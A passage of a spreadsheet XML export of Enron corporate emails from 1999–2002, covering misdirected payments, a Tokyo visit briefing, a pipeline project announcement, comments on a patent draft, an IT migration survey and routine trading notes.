To:	Zisman, Stuart_x000D_
Subject:	RE: More HPL money sent to ENRON_x000D_
_x000D_
hey, why get in the middle. its not our responsibility to get AEP their money. Don't you think it would be cleaner to just give it back to EL Paso._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Zisman, Stuart  _x000D_
Sent:	Tuesday, February 05, 2002 6:08 PM_x000D_
To:	Parks, Joe_x000D_
Subject:	FW: More HPL money sent to ENRON_x000D_
_x000D_
Here is the answer on the El Paso ?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Gray, Barbara N.  _x000D_
Sent:	Tuesday, February 05, 2002 5:42 PM_x000D_
To:	Zisman, Stuart; Coffey Jr., Jim; Redmond, Brian_x000D_
Subject:	RE: More HPL money sent to ENRON_x000D_
_x000D_
Send AEP the money, Enron has no interest in this money and it is not property of the Estate  bng_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Zisman, Stuart  _x000D_
Sent:	Tuesday, February 05, 2002 12:36 PM_x000D_
To:	Coffey Jr., Jim; Redmond, Brian; Gray, Barbara N._x000D_
Subject:	RE: More HPL money sent to ENRON_x000D_
_x000D_
I have received a similar question and would love to get an answer on this.  Is there a distinction between a loan and a payment received by mistake for purposes of repayment from a debtor company?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Coffey Jr., Jim  _x000D_
Sent:	Tuesday, February 05, 2002 11:26 AM_x000D_
To:	Zisman, Stuart; Redmond, Brian; Gray, Barbara N._x000D_
Subject:	More HPL money sent to ENRON_x000D_
_x000D_
We have just learned that Exxon sent their Sept, Oct, Nov, and Dec 2001 King Ranch Processing checks to Enron rather than to AEP totalling $4.6mm.  AEP have called asking for their money.  Please advise._x000D_
_x000D_
Jim Coffey, Senior Director_x000D_
Enron America - Texas Gas Origination_x000D_
Phone: (713)853-5346_x000D_
Fax: (713)646-3084_x000D_
e-mail:j.coffey@enron.com </t>
  </si>
  <si>
    <t>Fri, 11 May 2001 11:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tokyo visit</t>
  </si>
  <si>
    <t>Steve, I attach a briefing paper for your visit. A hard copy will be _x000D_
available for you on arrival. The paper includes the following:_x000D_
Itinerary_x000D_
Conference details_x000D_
Brattle paper summary_x000D_
Media interview background_x000D_
General key messages_x000D_
Electricity wholesaling reactive statement_x000D_
Political update_x000D_
Meeting briefing notes_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
You will note one further change to the itinerary. We will be meeting with _x000D_
METI rather than the Fair Trade Commission. The purpose of the METI meeting _x000D_
will be to explain our concerns with the current regulatory environment and _x000D_
Enron Japan's proposal to temporarily suspend its electricity wholesaling _x000D_
activities. We met with our METI working level contacts today to brief them _x000D_
on Brattle and in particular the shortcomings of the current system. We did _x000D_
not discuss suspension of our wholesaling activities. The meeting briefing _x000D_
notes will be available on your arrival in Tokyo._x000D_
_x000D_
_x000D_
I also attach the latest version of the Brattle paper and, for completeness, _x000D_
the final version of the presentation and notes. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
I will call you at the Palace Hotel on Monday at 6pm. If you have any hiccups _x000D_
with arrangements please let me know. My contact numbers are as follows:_x000D_
_x000D_
Home 813 52610539_x000D_
Mobile 8190 27334795_x000D_
Office 813 5219 4583_x000D_
_x000D_
I think we have stirred things up enough here in the last couple of days to _x000D_
make for an interesting visit for you. I look forward to seeing you on Monday._x000D_
_x000D_
kind regards</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 06:57:36 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;&lt;RE: Stepenovitch&gt;&gt; Your message_x000D_
_x000D_
  To:      jls@fullenweider.com_x000D_
  Subject: RE: Stepenovitch_x000D_
  Sent:    Tue, 23 Oct 2001 09:05:15 -0500_x000D_
_x000D_
was delivered to the following recipient(s):_x000D_
_x000D_
Jonda Stowell on Tue, 23 Oct 2001 08:57:36 -0500_x000D_
_x000D_
_x000D_
Message-ID: &lt;OFB481D879.54CF92AA-ON86256AEE.004D6454@enron.com&gt;_x000D_
From: Joe.Stepenovitch@enron.com_x000D_
To: jls@fullenweider.com_x000D_
Subject: RE: Stepenovitch_x000D_
Date: Tue, 23 Oct 2001 09:05:15 -0500_x000D_
Return-Receipt-To: Joe.Stepenovitch@enron.com_x000D_
MIME-Version: 1.0_x000D_
X-Mailer: Internet Mail Service (5.5.2653.19)_x000D_
X-MS-Embedded-Report:_x000D_
Content-Type: text/plain;	charset="iso-8859-1"</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 10:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mika.watanabe@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jackie.gentle@enron.com', 'joseph.hirl@enron.com', 'eva.hoeffelman@enron.com', 'vance.meyer@enron.com', 'mark.palmer@enron.com', 'karen.denne@enron.com', "nicholas.o'day@enron.com", 'iona.maclean@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Nikkei Business (Jeff Skilling Mentions)</t>
  </si>
  <si>
    <t xml:space="preserve">Tom Taniguchi, the Nikkei Business reporter, has successfully seized on the _x000D_
opportunity to interview Jeff when he was in Washington D.C. in mid April. _x000D_
This is it -- Nikkei Business May 7 issue._x000D_
_x000D_
warm regards,_x000D_
Mika_x000D_
  </t>
  </si>
  <si>
    <t>Fri, 11 May 2001 08:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.kinsey@enron.com', 'kirk.lenart@enron.com', 'tracy.scott@enron.com', 'souad.mahmassani@enron.com', 'jay.reitmeyer@enron.com', 'frank.ermis@enron.com', 'michael.gasper@enron.com', 'elizabeth.hernandez@enron.com', 'rajesh.chettiar@enron.com', 'cora.pendergrass@enron.com', 'jeanne.wukasch@enron.com', 'brad.horn@enron.com', 'elizabeth.shim@enron.com', 'monique.sanchez@enron.com', 'darron.giron@enron.com', 'anna.santucci@enron.com', 'luchas.johnson@enron.com', 'billi.harrill@enron.com', 'ina.norman@enron.com', 'matthew.lenhart@enron.com', 'sandy.olofson@enron.com', 'camille.gerard@enron.com', 'chuck.ames@enron.com', 'claudia.guerra@enron.com', 'jane.tholt@enron.com', 'natalie.baker@enron.com', 'jackie.travis@enron.com', 'beth.jensen@enron.com', 'theresa.byrne@enron.com', 'jo.hill@enron.com', 'phyllis.miller@enron.com', 'margie.straight@enron.com', 'kristen.clause@enron.com', 'cathy.lira@enron.com', 'tammy.gilmore@enron.com', 'barry.feldman@enron.com', 'cheryl.wilchynski@enron.com', 'patrick.ryder@enron.com', 'yuan.tian@enron.com', 'brenda.fletcher@enron.com', 'mike.potter@enron.com', 'kulvinder.fowler@enron.com', 'albert.stromquist@enron.com', 'chance.rabon@enron.com', 'mike.grigsby@enron.com', 'denis.tu@enron.com', 'phillip.allen@enron.com', 'sladana-anna.kulic@enron.com', 'david.ryan@enron.com', "ryan.o'rourke@enron.com", 'bilal.bajwa@enron.com', 'sonja.galloway@enron.com', 'bradley.jones@enron.com', 'randy.cantrell@enron.com', 'john.millar@enron.com', 'kimat.singla@enron.com', 'andy.pace@enron.com', 'keith.holst@enron.com', 'cindy.ward@enron.com', 'alejandra.chavez@enron.com', 'jason.kaniss@enron.com', 'rika.imai@enron.com', 'kevin.brady@enron.com', 'jeff.royed@enron.com', 'victor.guggenheim@enron.com', 'kevin.cline@enron.com', 'carole.frank@enron.com', 'eric.smith@enron.com', 'jad.doan@enron.com', 'maria.garza@enron.com', 'todd.decook@enron.com', 'randall.gay@enron.com', 'charles.muzzy@enron.com', 'martha.sumner-kenney@enron.com', 'phillip.love@enron.com', 'mary.franklin@enron.com', 'mark.schrab@enron.com', 'lam.nguyen@enron.com', 'anne.bike@enron.com', 'binh.pham@enron.com', 'clayton.vernon@enron.com', 'jessica.white@enron.com', 'grace.kim@enron.com', 'max.brown@enron.com', 'julie.armstrong@enron.com', 'kyle.lilly@enron.com', 'david.baumbach@enron.com', 'darren.espey@enron.com', 'tori.kuykendall@enron.com', 'maggie.schroeder@enron.com', 'bruce.mills@enron.com', 'catherine.huynh@enron.com', 'teresa.mcomber@enron.com', 'suzanne.calcagno@enron.com', 'daniel.castagnola@enron.com', 'eva.tow@enron.com', 'kam.keiser@enron.com', "o'neal.winfree@enron.com", 'wes.dempsey@enron.com', 'john.ayres@enron.com', 'danny.mccarty@enron.com', 'derek.anderson@enron.com'})</t>
  </si>
  <si>
    <t>2- SURVEY/INFORMATION EMAIL 5-14- 01</t>
  </si>
  <si>
    <t xml:space="preserve">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Double Click on document to put it in "Edit" mode. When you finish, _x000D_
simply click on the 'Reply With History' button then hit 'Send'  Your survey _x000D_
will automatically be sent to the Outlook 2000 Migration Mailbox._x000D_
_x000D_
Thank you._x000D_
_x000D_
Outlook 2000 Migration Team_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
--------------------------------------------------------------_x000D_
_x000D_
Full Name:        _x000D_
_x000D_
Login ID:  _x000D_
_x000D_
Extension:  _x000D_
_x000D_
Office Location:  _x000D_
_x000D_
What type of computer do you have?  (Desktop,  Laptop,  Both)  _x000D_
_x000D_
Do you have a PDA?  If yes, what type do you have:   (None, IPAQ, Palm Pilot, _x000D_
Jornada)  _x000D_
_x000D_
Do you have permission to access anyone's Email/Calendar?  _x000D_
    If yes, who?  _x000D_
_x000D_
Does anyone have permission to access your Email/Calendar?  _x000D_
    If yes, who?  _x000D_
_x000D_
Are you responsible for updating anyone else's address book?  _x000D_
    If yes, who?  _x000D_
_x000D_
Is anyone else responsible for updating your address book?  _x000D_
    If yes, who?  _x000D_
_x000D_
Do you have access to a shared calendar?  _x000D_
    If yes, which shared calendar?  _x000D_
_x000D_
Do you have any Distribution Groups that Messaging maintains for you (for _x000D_
mass mailings)?  _x000D_
    If yes, please list here:  _x000D_
_x000D_
Please list all Notes databases applications that you currently use:  _x000D_
_x000D_
In our efforts to plan the exact date/time of your migration, we also will _x000D_
need to know:_x000D_
_x000D_
What are your normal work hours?  From:      To:      _x000D_
_x000D_
Will you be out of the office in the near future for vacation, leave, etc?_x000D_
       If so, when?        From (MM/DD/YY):      To (MM/DD/YY):      _x000D_
</t>
  </si>
  <si>
    <t>Thu, 21 Sep 2000 04:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>I think you and I may have different documents.  Maybe we should compare._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Fri, 3 Nov 2000 01:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michel.nelson@enron.com', 'rockey.storie@enron.com', 'steve.gilbert@enron.com', 'craig.buehler@enron.com', 'laura.lantefield@enron.com', 'bob.stevens@enron.com', 'steve.klimesh@enron.com', 'jim.wiltfong@enron.com', 'susan.scott@enron.com', 'mike.barry@enron.com', 'michael.bodnar@enron.com', 'patrick.brennan@enron.com', 'roger.westfall@enron.com', 'miriam.martinez@enron.com', 'robert.mason@enron.com', 'donna.scott@enron.com', 'larry.pavlou@enron.com', 'jim.talcott@enron.com', 'michele.winckowski@enron.com', 'josie.call@enron.com', 'margaret.carson@enron.com', 'rob.wilson@enron.com', 'lorraine.lindberg@enron.com', 'bill.mangels@enron.com', 'chris.sebesta@enron.com', 'tim.kissner@enron.com', 'frank.oldenhuis@enron.com', 'loren.penkava@enron.com', 'mike.ullom@enron.com', 'kent.miller@enron.com', 'kay.threet@enron.com', 'yuan.tian@enron.com', 'mary.miller@enron.com', 'tim.johanson@enron.com', 'julia.white@enron.com', 'martha.janousek@enron.com', 'christine.stokes@enron.com', 'stephanie.korbelik@enron.com', 'shelley.corman@enron.com', 'reyna.cabrera@enron.com', 'bob.burleson@enron.com', 'john.williams@enron.com', 'tracy.schwartzkopf@enron.com', 'kimberly.watson@enron.com', 'sheila.nacey@enron.com', 'sue.neville@enron.com', 'morgan.gottsponer@enron.com', 'carolyn.descoteaux@enron.com', 'don.powell@enron.com', 'becki.souci@enron.com', 'gary.sova@enron.com', 'john.goodpasture@enron.com', 'bill.fowler@enron.com', 'lindy.donoho@enron.com', 'donna.martens@enron.com', 'dave.neubauer@enron.com', 'vernon.mercaldo@enron.com', 'gary.choquette@enron.com', 'tony.perry@enron.com', 'rick.dietz@enron.com', 'lon.stanton@enron.com', 'lisa.valley@enron.com', 'jeff.nielsen@enron.com', 'kevin.hyatt@enron.com', 'frank.semin@enron.com', 'penny.mccarran@enron.com', 'jo.williams@enron.com', 'janet.bowers@enron.com', 'eileen.peebles@enron.com', 'john.fiscus@enron.com', 'glen.hass@enron.com', 'steven.harris@enron.com', 'stephen.herber@enron.com', 'david.marye@enron.com', 'steve.weller@enron.com', 'judy.beck@enron.com', 'ken.anderson@enron.com', 'jeffery.fawcett@enron.com', 'theresa.branney@enron.com', 'sebastian.corbacho@enron.com', 'ken.powers@enron.com', 'donald.vignaroli@enron.com', 'larry.swett@enron.com', 'chuck.wilkinson@enron.com', 'john.dushinske@enron.com', 'courtney.barker@enron.com', 'michael.ratner@enron.com', 'bryan.reinecke@enron.com', 'ld.stephens@enron.com', 'mike.mcgowan@enron.com', 'tk.lohman@enron.com', 'keith.petersen@enron.com', 'allen.cohrs@enron.com', 'doug.aschwege@enron.com', 'drew.fossum@enron.com', 'robert.johnson@enron.com', 'lee.huber@enron.com', 'neal.shaw@enron.com', 'sean.bolks@enron.com', 'steve.thomas@enron.com', 'dana.jones@enron.com', 'rita.bianchi@enron.com', 'lee.ferrell@enron.com', 'david.badura@enron.com', 'maria.pavlou@enron.com', 'mary.darveaux@enron.com', 'ranelle.paladino@enron.com', 'steven.january@enron.com', 'sarabeth.smith@enron.com', 'lynn.blair@enron.com', 'julie.mccoy@enron.com', 'bret.fritch@enron.com', 'dari.dornan@enron.com', 'michael.stage@enron.com', 'michelle.lokay@enron.com', 'karen.lagerstrom@enron.com', 'joni.bollinger@enron.com'})</t>
  </si>
  <si>
    <t>NBPL Announces New Bison Pipeline Project</t>
  </si>
  <si>
    <t xml:space="preserve">Note:  There will be a briefing meeting on the project in Denver on Nov. 14_x000D_
_x000D_
N. Border Plans Extension to Tap Powder River Basin_x000D_
_x000D_
Powder River Basin gas producers may be about to get a more direct route to _x000D_
Midwest markets. Northern Border Pipeline has released plans to build a new _x000D_
325-mile greenfield pipeline from McCabe, MT, to Gillette, WY, to tap the _x000D_
rapidly growing production in the Powder River, which is estimated to hold _x000D_
between 10 and 30 Tcf of gas. _x000D_
_x000D_
The basin's rapid production growth has captured the attention of the _x000D_
industry, with numerous proposed pipelines, including several new interstate _x000D_
plans that would bring gas to the Midcontinent gas grid. Northern Border's _x000D_
project, called the Bison Pipeline, would add a new route out of the basin _x000D_
for between 375,000 and 500,000 MMBtu/d of production starting in November _x000D_
2003. The pipeline is holding an open season on the proposal through Dec. 5. _x000D_
_x000D_
Receipt points are proposed with Bighorn, Fort Union Gas Gathering, MIGC and _x000D_
Thunder Creek Gas Services. A bi-directional interconnect accessing Williston _x000D_
Basin Interstate Pipeline's Baker storage field also is proposed. _x000D_
_x000D_
The connection with Northern Border will provide Powder River producers with _x000D_
direct access to several local distribution companies, including _x000D_
Montana-Dakota, Alliant Interstate Power, MidAmerican Energy, Nicor Gas, _x000D_
People Gas and Nipsco. It also provides access to ANR Pipeline, Midwestern, _x000D_
NGPL, Northern and Vector. _x000D_
_x000D_
The projected recourse rate is 26 cents/Dth/d, but a negotiated 10-year _x000D_
demand rate cuts 4 cents off that. The pipeline is offering _x000D_
"mileage-sensitive rates," which are expected to allow a shipper to tailor _x000D_
supply access and optimize transportation value. _x000D_
_x000D_
Northern Border plans to hold a briefing on the project in Denver on Nov. 14. _x000D_
For more information, contact project director Paul Miller in Omaha, NB, at _x000D_
(402) 398-7758 or James Hoff in Denver at (303) 575-6475, or see the _x000D_
pipeline's Web site at www.northernborderpartners.com. </t>
  </si>
  <si>
    <t>Mon, 27 Dec 1999 12:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>---------------------- Forwarded by Paul Drexelius/CES/ColumbiaGas on_x000D_
12/27/2000 02:09 PM ---------------------------_x000D_
_x000D_
_x000D_
Heidi Boyd_x000D_
12/27/99 02:04 PM_x000D_
_x000D_
To: 8145895507&amp;Lori Bunce&amp;BeldonBlake@mailfax_x000D_
cc: Noel Bartlo/CES/ColumbiaGas@ColumbiaGas, Paul_x000D_
Drexelius/CES/ColumbiaGas@ColumbiaGas, John Singer/CES/ColumbiaGas@ColumbiaGas_x000D_
Subject: January 2000 Volume_x000D_
_x000D_
Hi Lori,_x000D_
_x000D_
I believe we are still pulling our Local Production from you behind NYSEG,_x000D_
please let me know ASAP if you disagree._x000D_
_x000D_
I am going to pull    1620 dth's/day  , again, let me know if this creates a_x000D_
problem for you._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 20:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'shodgson@velaw.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Steve:_x000D_
_x000D_
As we discussed, I have attached a substantial redraft of the description of _x000D_
the invention for the EOL business method patent.  The attached is a clean _x000D_
version; while you can run a redline, I am not sure how much use it will be, _x000D_
since such large portions of the text have been moved around.  This only _x000D_
covers that portion of the patent up to the illustrative example of _x000D_
Clickpaper.com._x000D_
_x000D_
The attached description is the result of comments by several reviewers; _x000D_
there is general agreement that your drafts were technically correct, and _x000D_
that they incorporated all of the significant elements of the invention.  _x000D_
However, there was some sentiment that the description was not very _x000D_
"readable."  I have reviewed your drafts and my changes again just before _x000D_
sending this out, and I am pretty confident that none of my changes are _x000D_
substantive; however, there are some organizational changes and a lot of _x000D_
changes that try to explain the reasoning behind some of the elements of the _x000D_
invention._x000D_
_x000D_
In the interest of time, I am circulating this to the commercial team at the _x000D_
same time that I am sending it to you.  After you and they have had a chance _x000D_
to review it, we can convene a meeting with the inventors to wrap the _x000D_
application up.  As Peter Mims may have mentioned to you, we are in a bit of _x000D_
a time crunch because Louise Kitchen, one of the inventors, will be out on _x000D_
maternity leave in early May.  What is worse, I am on vacation until early _x000D_
May, leaving tomorrow morning.  However, I am available by phone and e-mail, _x000D_
and we can speak if we need to in order to move this along._x000D_
_x000D_
I suggest that we exchange e-mails or voicemails about next steps after you _x000D_
have had a chance to take a look at this._x000D_
_x000D_
With respect to the claims, in the ENR100/4-15 document, we have the _x000D_
following comments.  I suspect that our comments come from a basic _x000D_
misunderstanding or lack of knowledge about how claims are actually drafted, _x000D_
and how they actually are supposed to work, and there is probably a very good _x000D_
reason that you constructed them the way you did; therefore, I have included _x000D_
our comments for what they are worth._x000D_
_x000D_
Claim 1, line 17:  We don't think we use computer software to evaluate credit _x000D_
risk; our credit department determines credit headroom through procedures _x000D_
completely independent of the website.  However, this system does monitor _x000D_
headroom._x000D_
_x000D_
Claim 1, line 24:  Does someone get around this claim simply by charging a _x000D_
commission?_x000D_
_x000D_
Claim 10:  Why should we limit claim 7 to specific products?  _x000D_
_x000D_
With respect to the claims in the ENR100/4-17 document, we have the following _x000D_
comments:_x000D_
_x000D_
Our biggest concern here is that these claims potentially describe a system _x000D_
that was in operation before EnronOnline was launched -- something called _x000D_
NGX, according to Dave Forster.  It provided a dedicated connectino (not _x000D_
internet based) -- but companies could put in bids and offers on a variet of _x000D_
products.  The transactions were alwasy with NGX, which more or less cleared _x000D_
deals for a fee.  According to Dave:_x000D_
_x000D_
 Claim 2 could describe NGX._x000D_
_x000D_
 In Claim 3, the use of the terms "stack maanger software" is the only way we _x000D_
can differentiate claim 3 from NGX _x000D_
_x000D_
 However, claim 4 is unique to EOL_x000D_
_x000D_
 Claim 6, we would say "completion of a hedging transaction"_x000D_
_x000D_
 Claim 13 -- looks like NGX_x000D_
_x000D_
 Claims 14, 15 and 16 -- lots of other sites have credit limits_x000D_
_x000D_
 Claim 17 -- really says nothing , but claims 17, 18 and 19 together describe _x000D_
the contracting process_x000D_
_x000D_
 Claim 20 to 24 really describe collectively the engine for creating a new _x000D_
product_x000D_
_x000D_
 Claim 25 and 26 -- nothing novel in these two_x000D_
_x000D_
 Claim 28 -- nothing novel_x000D_
_x000D_
 claim 29 -- nothing novel_x000D_
 _x000D_
 claim 34 -- could do that on NGX_x000D_
_x000D_
 claim 44 -- first line is NGX_x000D_
_x000D_
 claim 45 -- not sure what the second paragraph accomplishes_x000D_
_x000D_
 claim 49 -- can someone avoid this patent by charging a commission?_x000D_
_x000D_
 claim 50 -- I don't think Clickpaper is actually using hubs -- not sure if _x000D_
this is valuable_x000D_
_x000D_
 claim 51 -- this is just a description of a contract_x000D_
_x000D_
 claim 55 -- everyone does this_x000D_
_x000D_
 claim 56 through 58 -- lots of people have been doing this for years_x000D_
_x000D_
_x000D_
Again, these comments to the claims are included here only for what they are _x000D_
worth; I suspect our comments come from a lack of understanding about how _x000D_
they should be constructed for maximum effect.   _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Enron North America Corp._x000D_
1400 Smith Street EB 3893_x000D_
Houston Texas 77002_x000D_
Phone:  (713) 853-1575_x000D_
Fax: (713) 646-3490      </t>
  </si>
  <si>
    <t>Fri, 10 Mar 2000 06:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ahebert@akingump.com'})</t>
  </si>
  <si>
    <t>so ya wanna be a FERC lawyer, Part II</t>
  </si>
  <si>
    <t xml:space="preserve">Part II:  FERC Writing Handbook_x000D_
_x000D_
1.  "WHEREFORE, PREMISES CONSIDERED" adds a note of authority to your _x000D_
pleadings.  In fact, some administrative law judges will throw your pleading _x000D_
into the special incinerator marked "Nonconforming Pleadings" (located on the _x000D_
west side of the FERC building) unless such language is present._x000D_
_x000D_
2.  Pronouns should be used sparingly, if at all.  With few exceptions, _x000D_
parties must always be named to avoid confusion, even if it means the name of _x000D_
the party will appear several times in one sentence._x000D_
_x000D_
3.  The verb "request" may not be used without the word "to."  Example:  _x000D_
"Pipeline X respectfully requests the Commission to grant its motion."_x000D_
_x000D_
4.  "In regards to" or "vis-a-via" sound more intelligent than "about" or _x000D_
"concerning."_x000D_
_x000D_
5.  If you are not sure you've conveyed an important point effectively, _x000D_
repeat the statement verbatim at various other points in your pleading for _x000D_
emphasis.  Additionally, repeating a contractual provision several times in a _x000D_
contract will give your client greater rights than if you only include the _x000D_
provision once._x000D_
_x000D_
6.  Always recite the entire history of the proceeding in your pleading _x000D_
before stating the purpose of your pleading.  No FERC staffer ever remembers _x000D_
what happens, and the added pages will make your pleading really impressive._x000D_
_x000D_
7.  When in doubt, insert more commas._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 18 Feb 2001 06:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Kinder Morgan Net Out for 2/15 @ Aquila Header meter #11230 &amp; HPL_x000D_
 meter 980072</t>
  </si>
  <si>
    <t>Please make a note that on 2/15 at Aquila Header (WGR pipe in system) meter _x000D_
#11230 &amp; HPL/Aquila Hdr meter #980072, that there is a net out of purchase _x000D_
deal 626230 &amp; sale to Kinder Morgan deal 626231 for a volume 29310. _x000D_
_x000D_
Let me know if you have any questions._x000D_
_x000D_
Thanks,_x000D_
Mark _x000D_
x33396</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 04:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frank.sayre@enron.com', 'francisco.leite@enron.com', 'sara.shackleton@enron.com', 'carol.clair@enron.com', 'cheryl.nelson@enron.com', 'mary.cook@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Top 10</t>
  </si>
  <si>
    <t>----- Forwarded by Tana Jones/HOU/ECT on 03/12/2001 12:47 PM -----_x000D_
_x000D_
	Tanya Rohauer/ENRON@enronXgate_x000D_
	03/12/2001 12:31 PM_x000D_
		 _x000D_
		 To: Susan Bailey/HOU/ECT@ECT, Stephanie Panus/NA/Enron@Enron, Samantha _x000D_
Boyd/NA/Enron@Enron, Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Top 10_x000D_
_x000D_
The following cps should be Top 10 Status:_x000D_
_x000D_
Dynegy Canada, inc._x000D_
Reliant Energy Services Canada, Inc._x000D_
Cleco Marketing &amp; Trading LLC_x000D_
Smith Barney AAA Energy Fund LP_x000D_
XL Trading Partners Ltd_x000D_
_x000D_
That is it for now.  We'll see if anymore pop up during the meeting._x000D_
_x000D_
Thanks,_x000D_
Tanya</t>
  </si>
  <si>
    <t>Sun, 15 Jan 0002 21:37:37 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">The following reports have been waiting for your approval for more than 4 days.  Please review._x000D_
_x000D_
Owner: Mark R McConnell_x000D_
Report Name: Expense Report_x000D_
Days In Mgr. Queue: 4_x000D_
</t>
  </si>
  <si>
    <t>Thu, 28 Dec 2000 03:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Nope.  Didn't piss me off.  I know how to interpret Mandy talk.   I just have _x000D_
been extremely busy.  Most of the other attorneys are gone and I am catching _x000D_
all their overflow.  _x000D_
_x000D_
The days off were mellow.  Went to Corpus Christi to see the family.  Usually _x000D_
holiday cheer.  How about you?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Mandy.Bowles@email.moore.com_x000D_
	12/28/2000 09:24 AM_x000D_
		 _x000D_
		 To: gerald.nemec@enron.com_x000D_
		 cc: _x000D_
		 Subject: _x000D_
_x000D_
_x000D_
Hey -_x000D_
Good to actually see you._x000D_
I thought maybe you were on vacation or something.  You never emailed me_x000D_
back - or did I piss you off?_x000D_
I wasn't trying to be rude if so.  Just being good ole sarcastic me._x000D_
_x000D_
How were your holidays?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 04:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Puget Sound # 467090</t>
  </si>
  <si>
    <t xml:space="preserve">I just heard back from Holli Krebs, who verified that Puget is right on this _x000D_
deal - the term should be December through February. I've changed it in the _x000D_
system._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Sharen Cason                           11/29/2000 08:26 AM_x000D_
	_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Puget Sound # 467090_x000D_
_x000D_
When I tried to verbally confirm this deal, the counterparty has this deal _x000D_
running for three months, December through February.  Could you check with _x000D_
the trader and either change it or have him talk to the counterparty about _x000D_
it.  Let me know._x000D_
_x000D_
Thanks!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 08:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'portland.shift@enron.com', 'volume_management_portland@enron.com'})</t>
  </si>
  <si>
    <t>Tosco Schedule Change</t>
  </si>
  <si>
    <t>On November 8th begining at HE 8 Tosco informed Real time that they were _x000D_
going off the grid with no return ETA.   They were scheduled in correctly for _x000D_
the day ahead at 7 MW.  We were able to take out hours 11-24 however, hours _x000D_
8-10 we were short ex-post by the 7 MW.  Toscos schedule was zeroed out by _x000D_
decing short term cali load in PGE 3 per Jeff Richter.  Note to real time _x000D_
night shift.  Tosco may be coming back on line completely but as of yet they _x000D_
have not  called back to notify when that may be.  Please contact me or _x000D_
Jeremy with any questions.</t>
  </si>
  <si>
    <t>Thu, 9 Mar 2000 09:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mcunningham@isda.org'})</t>
  </si>
  <si>
    <t>Re: Pacific Forest Resources</t>
  </si>
  <si>
    <t>At this point, I think they should be a subscriber member, since trading of _x000D_
paper is an emerging market._x000D_
_x000D_
Mark</t>
  </si>
  <si>
    <t>Thu, 17 Jan 2002 07:42:49 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'teb.lokey@enron.com', 'robert.kilmer@enron.com'})</t>
  </si>
  <si>
    <t>FW: TransPecos LOI with Pemex</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Here are my comments on the TransPecos LOI._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rapp, Bill  _x000D_
Sent:	Wednesday, January 16, 2002 2:29 PM_x000D_
To:	Watson, Kimberly; McConnell, Mark_x000D_
Cc:	Porter, J. Gregory; Pryor, Tony_x000D_
Subject:	TransPecos LOI with Pemex_x000D_
_x000D_
Kim and Mark,_x000D_
_x000D_
	Attached is a red-lined version of the TransPecos LOI with my suggested revisions. I'm available at your convenience to discuss these changes._x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 25 Jan 2000 03:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>San Diego Gas &amp; Electric</t>
  </si>
  <si>
    <t>San Diego has applied for a Password Application and wants to trade _x000D_
financial.  Per them, they have already been trading financial off-line with _x000D_
us, and I check with the Confirm Desk and that statement is true, Craig _x000D_
Breslau has done financial trades with them (I thought they weren't allowed _x000D_
to trade financial?!).  Anyway, can we now open them up to trade financial?</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 00:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kathy.reeves@enron.com', 'brian.gillis@enron.com'})</t>
  </si>
  <si>
    <t>Re: Basis Positions</t>
  </si>
  <si>
    <t xml:space="preserve">Kathy,_x000D_
_x000D_
I added Clark's Aeco position, however I don't show a Sumas Basis position.  _x000D_
Let me know how much of a sumas basis position he should have and I'll try to _x000D_
find it.   As for the prompt physical and gas daily positions, Lavorato _x000D_
requested that those positions be shown for intramonth only.  We have other _x000D_
traders in Houston that have prompt physical and gas daily positions that are _x000D_
not shown on this report.  _x000D_
_x000D_
Brian,_x000D_
_x000D_
I adjusted McKay and Lambie's positions, so they should be correct now.  Let _x000D_
